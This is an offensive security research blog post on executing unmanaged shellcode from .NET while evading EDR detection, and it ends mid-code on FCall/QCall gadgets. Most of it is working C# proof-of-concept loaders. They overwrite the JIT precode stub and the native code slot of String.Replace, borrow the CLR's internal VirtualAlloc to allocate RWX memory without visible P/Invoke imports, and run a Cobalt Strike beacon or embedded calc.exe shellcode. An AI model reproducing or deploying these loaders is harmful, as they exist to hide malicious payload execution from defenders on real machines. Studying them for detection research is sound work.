public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, uint flAllocationType, uint flProtect);

[DllImport("kernel32.dll")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);

[DllImport("kernel32.dll")]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

public static void StartShellcode(byte[] shellcode)
{
    uint threadId;

    IntPtr alloc = VirtualAlloc(IntPtr.Zero, shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);
    if (alloc == IntPtr.Zero) {
        return;
    }

    Marshal.Copy(shellcode, 0, alloc, shellcode.Length);
    IntPtr threadHandle = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, out threadId);
    WaitForSingleObject(threadHandle, 0xFFFFFFFF);
}

And all was fine, however it did not take long before defenders realised that a .NET binary referencing a bunch of suspicious methods provided a good indicator that the binary warranted further investigation:

And as an example of the obvious indicators that these imported methods yield, you will see that if you try and compile the above example on a machine protected by Defender, Microsoft will pop up a nice warning that you’ve just infected yourself with VirTool:MSIL/Viemlod.gen!A.

So with these detections throwing a spanner in the works, techniques of course evolved. One such evolution of unmanaged code execution came from the awesome research completed by @fuzzysec and @TheRealWover, who introduced the D/Invoke technique. If we exclude the projects DLL loader for the moment, the underlying technique to transition from managed to unmanaged code used by D/Invoke is facilitated by a crucial method, Marshal.GetDelegateForFunctionPointer. And if we look at the documentation, Microsoft tells us that this method “Converts an unmanaged function pointer to a delegate”. This gets around the fundamental problem of exposing those nasty imports, forcing defenders to go beyond the ImplMap table. A simple example of how we might use Marshal.GetDelegateForFunctionPointer to execute unmanaged code within a x64 process would be:

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr VirtualAllocDelegate(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);

[UnmanagedFunctionPointer(CallingConvention.Winapi)]
public delegate IntPtr ShellcodeDelegate();

public static IntPtr GetExportAddress(IntPtr baseAddr, string name)
{
    var dosHeader = Marshal.PtrToStructure<IMAGE_DOS_HEADER>(baseAddr);
    var peHeader = Marshal.PtrToStructure<IMAGE_OPTIONAL_HEADER64>(baseAddr + dosHeader.e_lfanew + 4 + Marshal.SizeOf<IMAGE_FILE_HEADER>());
    var exportHeader = Marshal.PtrToStructure<IMAGE_EXPORT_DIRECTORY>(baseAddr + (int)peHeader.ExportTable.VirtualAddress);

    for (int i = 0; i < exportHeader.NumberOfNames; i++)
    {
        var nameAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfNames + (i * 4));
        var m = Marshal.PtrToStringAnsi(baseAddr + (int)nameAddr);
        if (m == "VirtualAlloc")
        {
            var exportAddr = Marshal.ReadInt32(baseAddr + (int)exportHeader.AddressOfFunctions + (i * 4));
            return baseAddr + (int)exportAddr;
        }
    }

    return IntPtr.Zero;
}

public static void StartShellcodeViaDelegate(byte[] shellcode)
{
    IntPtr virtualAllocAddr = IntPtr.Zero;

    foreach (ProcessModule module in Process.GetCurrentProcess().Modules)
    {
        if (module.ModuleName.ToLower() == "kernel32.dll")
        {
            virtualAllocAddr = GetExportAddress(module.BaseAddress, "VirtualAlloc");
        }
    }

    var VirtualAlloc = Marshal.GetDelegateForFunctionPointer<VirtualAllocDelegate>(virtualAllocAddr);
    var execMem = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, (uint)(AllocationType.Commit | AllocationType.Reserve), (uint)MemoryProtection.ExecuteReadWrite);

    Marshal.Copy(shellcode, 0, execMem, shellcode.Length);

    var shellcodeCall = Marshal.GetDelegateForFunctionPointer<ShellcodeDelegate>(execMem);
    shellcodeCall();
}

So, with these methods out in the wild, are there any other techniques that we have available to us?

Targeting What We Cannot See

One of the areas hidden from casual .NET developers is the underlying CLR itself. Thankfully, Microsoft releases the source code for the CLR on GitHub, giving us a peek into how this beast actually operates.

Let’s start by looking at a very simple application:

using System;
using System.Runtime.InteropServices;

namespace Test
{
    public class Test
    {
        public static void Main(string[] args)
        {
            var testObject = "XPN TEST";
            GCHandle handle = GCHandle.Alloc("HELLO");
            IntPtr parameter = (IntPtr)handle;
            Console.WriteLine("testObject at addr: {0}", parameter);
            Console.ReadLine();
        }
    }
}

Once we have this compiled, we can attach WinDBG to gather some information on the internals of the CLR during execution. We’ll start with the pointer outputted by this program and use the !dumpobj command provided by the SOS extension to reveal some information on what the memory address references:

As expected, we see that this memory points to a System.String .NET object, and we find the addresses of various associated fields available to us. The first class that we are going to look at is MethodTable, which represents a .NET class or interface to the CLR. We can inspect this further with a WinDBG helper method of !dumpmt [ADDRESS]:

We can also dump a list of methods associated with the System.String .NET class with !dumpmt -md [ADDRESS]:

So how are the System.String .NET methods found relative to a MethodTable? Well according to what has become a bit of a bible of .NET internals for me, we need to study the EEClass class. We can do this using dt coreclr!EEClass [ADDRESS]:

Again, we see several fields, but of interest to identifying associated .NET methods is the m_pChunks field, which references a MethodDescChunk object consisting of a simple structure:

Appended to a MethodDescChunk object is an array of MethodDesc objects, which represent .NET methods exposed by the .NET class (in our case System.String). Each MethodDesc is aligned to 18 bytes when running within a x64 process:

To retrieve information on this method, we can pass the address over to the !dumpmd helper command which tells us that the first .NET method of our System.String is System.String.Replace:

Now before we continue, it’s worth giving a quick insight into how the JIT compilation process works when executing a method from .NET. As I’ve discussed in previous posts, the JIT process is “lazy” in that a method won’t be JIT’ed up front (with some exceptions which we won’t cover here). Instead compilation is deferred to first use, by directing execution via the coreclr!PrecodeFixupThunk method, which acts as a trampoline to compile the method:

Once a method is executed, the native code is JIT’ed and this trampoline is replaced with a JMP to the actual compiled code.

So how do we find the pointer to this trampoline? Well usually this pointer would live in a slot, which is located within a vector following the MethodTable, which is in turn indexed by the n_wSlotNumber of the MethodDesc object. But in some cases, this pointer immediately follows the MethodDesc object itself, as a so called “Local Slot”. We can tell if this is the case by looking at the m_wFlags member of the MethodDesc object for a method, and seeing if the following flag has been set:

If we dump the memory for our MethodDesc, we can see this pointer being located immediately after the object:

OK with our knowledge of how the JIT process works and some idea of how the memory layout of a .NET method looks in unmanaged land, let’s see if we can use this to our advantage when looking to execute unmanaged code.

Hijacking JIT Compilation to Execute Unmanaged Code

To execute our unmanaged code, we need to gain control over the RIP register, which now that we understand just how execution flows via the JIT process should be relatively straight forward.

To do this we will define a few structures which will help us to follow along and demonstrate our POC code a little more clearly. Let’s start with a MethodTable:

[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
    [FieldOffset(0)]
    public uint m_dwFlags;

    [FieldOffset(0x4)]
    public uint m_BaseSize;

    [FieldOffset(0x8)]
    public ushort m_wFlags2;

    [FieldOffset(0x0a)]
    public ushort m_wToken;

    [FieldOffset(0x0c)]
    public ushort m_wNumVirtuals;

    [FieldOffset(0x0e)]
    public ushort m_wNumInterfaces;

    [FieldOffset(0x10)]
    public IntPtr m_pParentMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pLoaderModule;

    [FieldOffset(0x20)]
    public IntPtr m_pWriteableData;

    [FieldOffset(0x28)]
    public IntPtr m_pEEClass;

    [FieldOffset(0x30)]
    public IntPtr m_pPerInstInfo;

    [FieldOffset(0x38)]
    public IntPtr m_pInterfaceMap;
}

Then we will also require a EEClass:

[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
    [FieldOffset(0)]
    public IntPtr m_pGuidInfo;

    [FieldOffset(0x8)]
    public IntPtr m_rpOptionalFields;

    [FieldOffset(0x10)]
    public IntPtr m_pMethodTable;

    [FieldOffset(0x18)]
    public IntPtr m_pFieldDescList;

    [FieldOffset(0x20)]
    public IntPtr m_pChunks;
}

Next we need our MethodDescChunk:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
    [FieldOffset(0)]
    public IntPtr m_methodTable;

    [FieldOffset(8)]
    public IntPtr m_next;

    [FieldOffset(0x10)]
    public byte m_size;

    [FieldOffset(0x11)]
    public byte m_count;

    [FieldOffset(0x12)]
    public byte m_flagsAndTokenRange;
}

And finally a MethodDesc:

[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
    [FieldOffset(0)]
    public ushort m_wFlags3AndTokenRemainder;

    [FieldOffset(2)]
    public byte m_chunkIndex;

    [FieldOffset(0x3)]
    public byte m_bFlags2;

    [FieldOffset(0x4)]
    public ushort m_wSlotNumber;

    [FieldOffset(0x6)]
    public ushort m_wFlags;

    [FieldOffset(0x8)]
    public IntPtr TempEntry;
}

With each structure defined, we’ll work with the System.String type and populate each struct:

Type t = typeof(System.String);
var mt = Marshal.PtrToStructure<MethodTable>(t.TypeHandle.Value);
var ee = Marshal.PtrToStructure<EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<MethodDescChunk>(ee.m_pChunks);
var md = Marshal.PtrToStructure<MethodDesc>(ec.m_pChunks + 0x18);

One snippet from above worth mentioning is t.TypeHandle.Value. Usefully for us, .NET provides us with a way to find the address of a MethodTable via the TypeHandle property of a type. This saves us some time hunting through memory when we are looking to target a .NET class such as the above System.String type.

Once we have the CLR structures for the System.String type, we can find our first .NET method pointer which as we saw above points to System.String.Replace:

// Located at MethodDescChunk_ptr + sizeof(MethodDescChunk) + sizeof(MethodDesc)
IntPtr stub = Marshal.ReadIntPtr(ee.m_pChunks + 0x18 + 0x8);

This gives us an IntPtr pointing to RWX protected memory, which we know is going to be executed once we invoke the System.String.Replace method for the first time, which will be when JIT compilation kicks in. Let’s see this in action by jmp‘ing to some unmanaged code. We will of course use a Cobalt Strike beacon to demonstrate this:

byte[] shellcode = System.IO.File.ReadAllBytes("beacon.bin");
mem = VirtualAlloc(IntPtr.Zero, shellcode.Length, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ExecuteReadWrite);
if (mem == IntPtr.Zero) {
    return;
}

Marshal.Copy(shellcode, 0, ptr2, shellcode.Length);

// Now we invoke our unmanaged code
"ANYSTRING".Replace("XPN","WAZ'ERE", true, null);

Put together we get code like this:

using System;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ExecStubOverwrite
{
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
{
Console.WriteLine(«[x] Error: mdcHasNonVtableSlot not set for this MethodDesc»);
return;
}
// Get the String.Replace method stub
IntPtr stub = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 8);
// Alloc mem with p/invoke for now…
var mem = Internals.VirtualAlloc(IntPtr.Zero, shellcode.Length, Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite);
Marshal.Copy(shellcode, 0, mem, shellcode.Length);
// Point the stub to our shellcode
Marshal.Copy(jmpCode, 0, stub, jmpCode.Length);
Marshal.WriteIntPtr(stub + 2, mem);
// FIRE!!
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
}
}
public static class Internals
{
[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
[FieldOffset(0)]
public uint m_dwFlags;
[FieldOffset(0x4)]
public uint m_BaseSize;
[FieldOffset(0x8)]
public ushort m_wFlags2;
[FieldOffset(0x0a)]
public ushort m_wToken;
[FieldOffset(0x0c)]
public ushort m_wNumVirtuals;
[FieldOffset(0x0e)]
public ushort m_wNumInterfaces;
[FieldOffset(0x10)]
public IntPtr m_pParentMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pLoaderModule;
[FieldOffset(0x20)]
public IntPtr m_pWriteableData;
[FieldOffset(0x28)]
public IntPtr m_pEEClass;
[FieldOffset(0x30)]
public IntPtr m_pPerInstInfo;
[FieldOffset(0x38)]
public IntPtr m_pInterfaceMap;
}
[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
[FieldOffset(0)]
public IntPtr m_pGuidInfo;
[FieldOffset(0x8)]
public IntPtr m_rpOptionalFields;
[FieldOffset(0x10)]
public IntPtr m_pMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pFieldDescList;
[FieldOffset(0x20)]
public IntPtr m_pChunks;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
[FieldOffset(0)]
public IntPtr m_methodTable;
[FieldOffset(8)]
public IntPtr m_next;
[FieldOffset(0x10)]
public byte m_size;
[FieldOffset(0x11)]
public byte m_count;
[FieldOffset(0x12)]
public byte m_flagsAndTokenRange;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
[FieldOffset(0)]
public ushort m_wFlags3AndTokenRemainder;
[FieldOffset(2)]
public byte m_chunkIndex;
[FieldOffset(0x3)]
public byte m_bFlags2;
[FieldOffset(0x4)]
public ushort m_wSlotNumber;
[FieldOffset(0x6)]
public ushort m_wFlags;
[FieldOffset(0x8)]
public IntPtr TempEntry;
}
public const int mdcHasNonVtableSlot = 0x0008;
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
[DllImport(«kernel32.dll», SetLastError = true, ExactSpelling = true)]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, int dwSize, AllocationType flAllocationType, MemoryProtection flProtect);
}
}

view rawExecStubOverwrite.cs hosted with ❤ by GitHub

Once executed, if everything goes well, we end up with our beacon spawning from within .NET:

Now I know what you’re thinking… what about that VirtualAlloc call that we made there… wasn’t that a P/Invoke that we were trying to avoid? Well, yes smarty pants! This was a P/Invoke, however in-keeping with our exploration of weird ways to invoke .NET, there is nothing stopping us from stealing an existing P/Invoke from the .NET framework. For example, if we look within the Interop.Kernel32 class, we’ll see a list of P/Invoke methods, including… VirtualAlloc:

So, what about if we just borrow that VirtualAlloc method for our evil bidding? Then we don’t have to P/Invoke directly from our code:

var kernel32 = typeof(System.String).Assembly.GetType("Interop+Kernel32");
var VirtualAlloc = kernel32.GetMethod("VirtualAlloc", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), 0x3000, 0x40 });

Now unfortunately the Interop.Kernel32.VirtualAlloc P/Invoke method returns a void*, which means that we receive a System.Reflection.Pointer type. This normally requires an unsafe method to play around with, which for the purposes of this post I’m trying to avoid. So let’s try and convert that into an IntPtr using the internal GetPointerValue method:

IntPtr alloc = (IntPtr)ptr.GetType().GetMethod("GetPointerValue", BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });

And there we have allocated RWX memory without having to directly reference any P/Invoke methods. Combined with our execution example, we end up with a POC like this:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ExecStubOverwriteWithoutPInvoke
{
public static void Execute(byte[] shellcode)
{
// mov rax, 0x4141414141414141
// jmp rax
var jmpCode = new byte[] { 0x48, 0xB8, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xFF, 0xE0 };
var t = typeof(System.String);
var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
{
Console.WriteLine(«[x] Error: mdcHasNonVtableSlot not set for this MethodDesc»);
return;
}
// Get the String.Replace method stub
IntPtr stub = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 8);
// Nick p/invoke from CoreCLR Interop.Kernel32.VirtualAlloc
var kernel32 = typeof(System.String).Assembly.GetType(«Interop+Kernel32»);
var VirtualAlloc = kernel32.GetMethod(«VirtualAlloc», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Allocate memory
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
// Convert void* to IntPtr
IntPtr mem = (IntPtr)ptr.GetType().GetMethod(«GetPointerValue», BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
Marshal.Copy(shellcode, 0, mem, shellcode.Length);
// Point the stub to our shellcode
Marshal.Copy(jmpCode, 0, stub, jmpCode.Length);
Marshal.WriteIntPtr(stub + 2, mem);
// FIRE!!
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
}
public static class Internals
{
[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
[FieldOffset(0)]
public uint m_dwFlags;
[FieldOffset(0x4)]
public uint m_BaseSize;
[FieldOffset(0x8)]
public ushort m_wFlags2;
[FieldOffset(0x0a)]
public ushort m_wToken;
[FieldOffset(0x0c)]
public ushort m_wNumVirtuals;
[FieldOffset(0x0e)]
public ushort m_wNumInterfaces;
[FieldOffset(0x10)]
public IntPtr m_pParentMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pLoaderModule;
[FieldOffset(0x20)]
public IntPtr m_pWriteableData;
[FieldOffset(0x28)]
public IntPtr m_pEEClass;
[FieldOffset(0x30)]
public IntPtr m_pPerInstInfo;
[FieldOffset(0x38)]
public IntPtr m_pInterfaceMap;
}
[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
[FieldOffset(0)]
public IntPtr m_pGuidInfo;
[FieldOffset(0x8)]
public IntPtr m_rpOptionalFields;
[FieldOffset(0x10)]
public IntPtr m_pMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pFieldDescList;
[FieldOffset(0x20)]
public IntPtr m_pChunks;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
[FieldOffset(0)]
public IntPtr m_methodTable;
[FieldOffset(8)]
public IntPtr m_next;
[FieldOffset(0x10)]
public byte m_size;
[FieldOffset(0x11)]
public byte m_count;
[FieldOffset(0x12)]
public byte m_flagsAndTokenRange;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
[FieldOffset(0)]
public ushort m_wFlags3AndTokenRemainder;
[FieldOffset(2)]
public byte m_chunkIndex;
[FieldOffset(0x3)]
public byte m_bFlags2;
[FieldOffset(0x4)]
public ushort m_wSlotNumber;
[FieldOffset(0x6)]
public ushort m_wFlags;
[FieldOffset(0x8)]
public IntPtr TempEntry;
}
public const int mdcHasNonVtableSlot = 0x0008;
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}

view rawExecStubOverwriteWithoutPInvoke.cs hosted with ❤ by GitHub

And when executed, we get a nice beacon:

Now this is nice, but what about if we want to run unmanaged code and then resume executing further .NET code afterwards? Well we can do this in a few ways, but let’s have a look at what happens to our MethodDesc after the JIT process has completed. If we take a memory dump of the String.Replace MethodDesc before we have it JIT’d:

And then we look again after, we will see an address being populated:

And if we dump the memory from this address:

What you are seeing here is called a “Native Code Slot”, which is a pointer to the compiled methods native code once the JIT process has completed. Now this field is not guaranteed to be present, and we can tell if the MethodDesc provides a location for a Native Code Slot by again looking at the m_wFlags property:

The flag that we are looking to be set is mdcHasNativeCodeSlot:

If this flag is present, we can simply force JIT compilation and update the Native Code Slot, pointing it to our desired unmanaged code, meaning further execution of the .NET method will trigger our payload. Once executed, we can then jump back to the actual JIT’d native code to ensure that the original .NET code is executed. The code to do this looks like this:

using System;
using System.Reflection;
using System.Runtime.InteropServices;
namespace NautilusProject
{
public class ExecNativeSlot
{
public static void Execute()
{
// WinExec of calc.exe, jmps to address set in last 8 bytes
var shellcode = new byte[]
{
0x55, 0x48, 0x89, 0xe5, 0x9c, 0x53, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
0x41, 0x52, 0x41, 0x53, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
0x56, 0x57, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x60, 0x00, 0x00, 0x00, 0x48,
0x8b, 0x40, 0x18, 0x48, 0x8b, 0x70, 0x10, 0x48, 0xad, 0x48, 0x8b, 0x30,
0x48, 0x8b, 0x7e, 0x30, 0x8b, 0x5f, 0x3c, 0x48, 0x01, 0xfb, 0xba, 0x88,
0x00, 0x00, 0x00, 0x8b, 0x1c, 0x13, 0x48, 0x01, 0xfb, 0x8b, 0x43, 0x20,
0x48, 0x01, 0xf8, 0x48, 0x89, 0xc6, 0x48, 0x31, 0xc9, 0xad, 0x48, 0x01,
0xf8, 0x81, 0x38, 0x57, 0x69, 0x6e, 0x45, 0x74, 0x05, 0x48, 0xff, 0xc1,
0xeb, 0xef, 0x8b, 0x43, 0x1c, 0x48, 0x01, 0xf8, 0x8b, 0x04, 0x88, 0x48,
0x01, 0xf8, 0xba, 0x05, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0d, 0x25, 0x00,
0x00, 0x00, 0xff, 0xd0, 0x5f, 0x5e, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d,
0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59,
0x5b, 0x9d, 0x48, 0x89, 0xec, 0x5d, 0x48, 0x8b, 0x05, 0x0b, 0x00, 0x00,
0x00, 0xff, 0xe0, 0x63, 0x61, 0x6c, 0x63, 0x2e, 0x65, 0x78, 0x65, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
var t = typeof(System.String);
var mt = Marshal.PtrToStructure<Internals.MethodTable>(t.TypeHandle.Value);
var ec = Marshal.PtrToStructure<Internals.EEClass>(mt.m_pEEClass);
var mdc = Marshal.PtrToStructure<Internals.MethodDescChunk>(ec.m_pChunks);
var md = Marshal.PtrToStructure<Internals.MethodDesc>(ec.m_pChunks + 0x18);
if ((md.m_wFlags & Internals.mdcHasNonVtableSlot) != Internals.mdcHasNonVtableSlot)
{
Console.WriteLine(«[x] Error: mdcHasNonVtableSlot not set for this MethodDesc»);
return;
}
if ((md.m_wFlags & Internals.mdcHasNativeCodeSlot) != Internals.mdcHasNativeCodeSlot)
{
Console.WriteLine(«[x] Error: mdcHasNativeCodeSlot not set for this MethodDesc»);
return;
}
// Trigger Jit of String.Replace method
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
// Get the String.Replace method native code pointer
IntPtr nativeCodePointer = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 0x10);
// Steal p/invoke from CoreCLR Interop.Kernel32.VirtualAlloc
var kernel32 = typeof(System.String).Assembly.GetType(«Interop+Kernel32»);
var VirtualAlloc = kernel32.GetMethod(«VirtualAlloc», System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static);
// Allocate memory
var ptr = VirtualAlloc.Invoke(null, new object[] { IntPtr.Zero, new UIntPtr((uint)shellcode.Length), Internals.AllocationType.Commit | Internals.AllocationType.Reserve, Internals.MemoryProtection.ExecuteReadWrite });
// Convert void* to IntPtr
IntPtr mem = (IntPtr)ptr.GetType().GetMethod(«GetPointerValue», BindingFlags.NonPublic | BindingFlags.Instance).Invoke(ptr, new object[] { });
Marshal.Copy(shellcode, 0, mem, shellcode.Length);
// Take the original address
var orig = Marshal.ReadIntPtr(ec.m_pChunks + 0x18 + 0x10);
// Point the native code pointer to our shellcode directly
Marshal.WriteIntPtr(ec.m_pChunks + 0x18 + 0x10, mem);
// Set original address
Marshal.WriteIntPtr(mem + shellcode.Length — 8, orig);
// Charging Ma Laz0r…
System.Threading.Thread.Sleep(1000);
// FIRE!!
«ANYSTRING».Replace(«XPN», «WAZ’ERE», true, null);
// Restore previous native address now that we’re done
Marshal.WriteIntPtr(ec.m_pChunks + 0x18 + 0x10, orig);
}
public static class Internals
{
[StructLayout(LayoutKind.Explicit)]
public struct MethodTable
{
[FieldOffset(0)]
public uint m_dwFlags;
[FieldOffset(0x4)]
public uint m_BaseSize;
[FieldOffset(0x8)]
public ushort m_wFlags2;
[FieldOffset(0x0a)]
public ushort m_wToken;
[FieldOffset(0x0c)]
public ushort m_wNumVirtuals;
[FieldOffset(0x0e)]
public ushort m_wNumInterfaces;
[FieldOffset(0x10)]
public IntPtr m_pParentMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pLoaderModule;
[FieldOffset(0x20)]
public IntPtr m_pWriteableData;
[FieldOffset(0x28)]
public IntPtr m_pEEClass;
[FieldOffset(0x30)]
public IntPtr m_pPerInstInfo;
[FieldOffset(0x38)]
public IntPtr m_pInterfaceMap;
}
[StructLayout(LayoutKind.Explicit)]
public struct EEClass
{
[FieldOffset(0)]
public IntPtr m_pGuidInfo;
[FieldOffset(0x8)]
public IntPtr m_rpOptionalFields;
[FieldOffset(0x10)]
public IntPtr m_pMethodTable;
[FieldOffset(0x18)]
public IntPtr m_pFieldDescList;
[FieldOffset(0x20)]
public IntPtr m_pChunks;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDescChunk
{
[FieldOffset(0)]
public IntPtr m_methodTable;
[FieldOffset(8)]
public IntPtr m_next;
[FieldOffset(0x10)]
public byte m_size;
[FieldOffset(0x11)]
public byte m_count;
[FieldOffset(0x12)]
public byte m_flagsAndTokenRange;
}
[StructLayout(LayoutKind.Explicit)]
public struct MethodDesc
{
[FieldOffset(0)]
public ushort m_wFlags3AndTokenRemainder;
[FieldOffset(2)]
public byte m_chunkIndex;
[FieldOffset(0x3)]
public byte m_bFlags2;
[FieldOffset(0x4)]
public ushort m_wSlotNumber;
[FieldOffset(0x6)]
public ushort m_wFlags;
[FieldOffset(0x8)]
public IntPtr TempEntry;
}
public const int mdcHasNonVtableSlot = 0x0008;
public const int mdcHasNativeCodeSlot = 0x0020;
[Flags]
public enum AllocationType
{
Commit = 0x1000,
Reserve = 0x2000,
Decommit = 0x4000,
Release = 0x8000,
Reset = 0x80000,
Physical = 0x400000,
TopDown = 0x100000,
WriteWatch = 0x200000,
LargePages = 0x20000000
}
[Flags]
public enum MemoryProtection
{
Execute = 0x10,
ExecuteRead = 0x20,
ExecuteReadWrite = 0x40,
ExecuteWriteCopy = 0x80,
NoAccess = 0x01,
ReadOnly = 0x02,
ReadWrite = 0x04,
WriteCopy = 0x08,
GuardModifierflag = 0x100,
NoCacheModifierflag = 0x200,
WriteCombineModifierflag = 0x400
}
}
}
}

view rawExecNativeSlot.cs hosted with ❤ by GitHub

And when run, we see that we can resume .NET execution after our unmanaged code has finished executing:

So, what else can we find in the .NET runtime, are there any other quirks we can use to transition between managed and unmanaged code?

InternalCall and QCall

If you’ve spent much time disassembling the .NET runtime, you will have come across methods annotated with attributes such as [MethodImpl(MethodImplOptions.InternalCall)]:

In other areas, you will see references to a DllImport to a strangely named QCall DLL:

Both are examples of code which transfer execution into the CLR. Inside the CLR they are referred to as an “FCall” and “QCall” respectively. The reasons that these calls exist are varied, but essentially when the .NET framework can’t do something from within managed code, a FCall or QCall is used to request native code perform the function before returning back to .NET.

One good example of this in action is something that we’ve already encountered, Marshal.GetDelegateForFunctionPointer. If we disassemble the System.Private.CoreLib DLL we see that this is ultimately marked as an FCall:

Let’s follow this path further into the CLR source code and see where the call ends up. The file that we need to look at is ecalllist.h, which describes the FCall and QCall methods implemented within the CLR, including our GetDelegateForFunctionPointerInternal call:

If we jump over to the native method MarshalNative::GetFunctionPointerForDelegateInternal, we can actually see the native code used when this method is called:

Now… wouldn’t it be cool if we could find some of these FCall and QCall gadgets which would allow us to play around with unmanaged memory? After all, forcing defenders to transition between .NET code disassembly into reviewing the source for the CLR certainly would slow down static analysis… hopefully increasing that WTF!! factor during analysis. Let’s start by hunting for a set of memory read and write gadgets which as we now know from above, will lead to code execution.

The first .NET method we will look at is System.StubHelpers.StubHelpers.GetNDirectTarget, which is an internal static method:

Again we can trace this code into the CLR and see what is happening:

OK so this looks good, here we have an IntPtr being passed from managed to unmanaged code, without any kind of validation that the pointer we are passing is in fact a NDirectMethodDesc object pointer. So what does that pNMD->GetNDirectTarget() call do?

So here we have a method returning a member variable from an object we control. A review shows us that we can use this to return arbitrary memory of IntPtr.Size bytes in length. How can we do this? Well let’s return to .NET and try the following code:

using System;
